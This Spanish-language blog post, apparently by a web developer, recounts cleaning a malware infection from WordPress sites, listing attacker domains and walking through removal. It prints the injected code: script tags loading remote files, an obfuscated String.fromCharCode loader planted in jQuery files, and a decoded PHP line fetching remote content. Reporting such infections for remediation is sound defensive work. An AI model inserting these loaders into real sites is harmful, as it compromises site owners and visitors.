Hola buenas tardes, hace ya varios días algunos sitios web de mis clientes fueron infectados por una especie de código malicioso que se encarga de ejecutar cadenas de código de forma no autorizada en nuestro servidor, este post lo escribo porque me gustaría explicar un poco el proceso que yo  realice para poder recuperar los sitios web.

Lo primero es saber si estas infectado, muchas veces aparece una ventana de «verificación humano-maquina» yo voy a mostrar el proceso de la infección en uno de lo sitios web que comentaba: cam-link.com

Esta pagina tiene una instalación básica de WordPress, con una plantilla predeterminada y los siguientes plugins:

No he descargado ningún plugin fuera de la pagina oficial de WordPress, además que no he descargo o instalado ninguna plantilla Null.

Si ingresamos al sitio web cam-link.com la pagina tardara demasiado en cargar, y finalmente nos redirigirá hacia el sitio de la infección:

La pagina web ha sido modificada por algún archivo malicioso, No soy el mas conocedor de JavaScript o de Php pero entiendo que debe haber algún fallo de seguridad en WordPress o en alguno de los plugins, la otra posibilidad seria que en los otros sitios que tengo alojados en este hosting compartido tuviesen la infección y esta misma se trasladara hasta este dominio.

Paginas de Infección.

Los dominios que hasta ahora he visto involucrados en la infección han sido los siguientes:

  • alsutrans.com
  • cdn.allyouwant.online
  • cdn.eeduelements.com
  • cdnallyouwantonline.innocraft.cloud
  • yetill.com
  • utroro.com
  • polonofiex.ga
  • valusc.com

¿Cómo Eliminar la Infección?

Bueno lo primero que tenemos que hacer es ir a Apariencia – editor y abrir el archivo header.php

Y buscar un script que se ejecuta que debe ser igual a este:

<script type='text/javascript' src='https://cdn.allyouwant.online/main.js?t=lp1'></script>

También este es otro código en otro dominio que también causa la infección:

<script type='text/javascript' src='https://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script>

Revisando el comentario del header.php se puede ver el código malicioso en forma de comentario, se debe eliminar antes de continuar.

debe quedar asi:

Ahora debemos seguir bajando en el código y buscar donde mas se repiten estas cadenas de texto

Nada mas en el header aparecen como 4 veces:

Borrándolo quedan así:

Si recargamos la pagina principal del sitio debe entrar con normalidad, y no aparecer las cadenas de código, pero el archivo ha generado otras infecciones que se han extendido hacia otros archivos.

El archivo malicioso daña el archivo nativo JQuery

Revisando el contenido de dos archivos nativos de jQuery usados para el funcionamiento regular del sitio he detectado anomalias:

Archivo de jQuery de la pagina versión 1.12.4 – Link: https://pastebin.com/8jJcAE5b

Archivo de jQuery real versión 1.12.4 – Link: https://code.jquery.com/jquery-1.12.4.js

Archivo jQuery minificado de la pagina versión 1.4.1 – Link: https://pastebin.com/Nqu3F1p3

Archivo jQuery minificado Real versión 1.4.1 – Link: https://code.jquery.com/jquery-migrate-1.4.1.js

Como pueden ver hay demasiadas diferencias,  pueden ser solo estos los archivos infectados pero yo recomiendo reemplazarlos todos. Tienen que descargar los archivos reales de jQuery, después por medio de FileZilla o usando el Cpanel debemos borrar los archivos infectados,  vamos al administrador de archivos y seguimos la ruta de nuestro WordPress:

Aquí están todas las versiones de jQuery: https://code.jquery.com/jquery/  yo recomiendo instalar la versión mas reciente para evitar fallos.

Ahora hasta ahora creo que todos los archivos están infectados, se deben eliminar uno a uno y subir la copia oficial.

El primer archivo jquery-migrate.js lo usare de ejemplo para demostrar la infección:

Al abrirlo encontramos como primero una variable declarada asi:

var po = document.createElement('script'); po.type = 'text/javascript'; po.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 99, 100, 110, 46, 97, 108, 108, 121, 111, 117, 119, 97, 110, 116, 46, 111, 110, 108, 105, 110, 101, 47, 109, 97, 105, 110, 46, 106, 115, 63, 116, 61, 106, 108, 99); var scripts = document.getElementsByTagName('script'); 
var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == po.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(po);}/*!

El archivo infectado ha sobre-escrito todas las cabeceras de archivos vitales para el funcionamiento de la pagina web, debemos cambiarlos por el oficial, asi quedaría algo similar a esto:

 

A simple vista se ve claras las cadenas de código, y no tiene nada ofuscado o variables extrañas. debemos repetir el mismo proceso en todos los archivos jQuery de nuestra pagina web.

La infección demuestra haber alcanzado todos los archivos, por ejemplo abriendo el archivo jquery.form.js que tiene la pagina se puede ver de la siguiente forma:

La cabecera tiene inyectado la variable extraña que sinceramente desconozco su significado, supongo que ejecuta algún código o cadena de texto, al cambiarlo por el archivo real de jQuery obtenemos un resultado muy diferente:

 

 

Esto se debe repetir en cada uno de los archivos jQuery, se debe buscar manualmente los archivos correctos, mas adelante hare una lista con ellos.

Editor de Plugins

Algunos plugins via editor en el index.php se puede ver una cadena php codificada:

con una pagina web he logrado descifrar el contenido y sale algo similar a esto:

error_reporting(0); ini_set("display_errors", 0); echo @file_get_contents("https://alsutrans.com/stats.js");//prevent directory listing

El dominio: https://alsutrans.com/stats.js tiene un archivo con este código:

<script type="text/javascript">
document.write("<div style='position:absolute;left:-4859px;'><a href='//www.liveinternet.ru/click;horselorse5151' "+
"target=_blank><img src='//counter.yadro.ru/hit;horselorse5151?t44.6;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";h"+escape(document.title.substring(0,150))+";"+Math.random()+
"' alt='' title='LiveInternet' "+
"border='0' width='31' height='31'><\/a><\/div>")
</script>

Esto como que manda trafico a un motor ruso pero no lo entiendo muy bien, ire actualizando este post.

×

Contacto Whatsapp!

Contactame debajo o escribeme un email a dismal.creative@gmail.com

× ¿Cómo puedo ayudarte?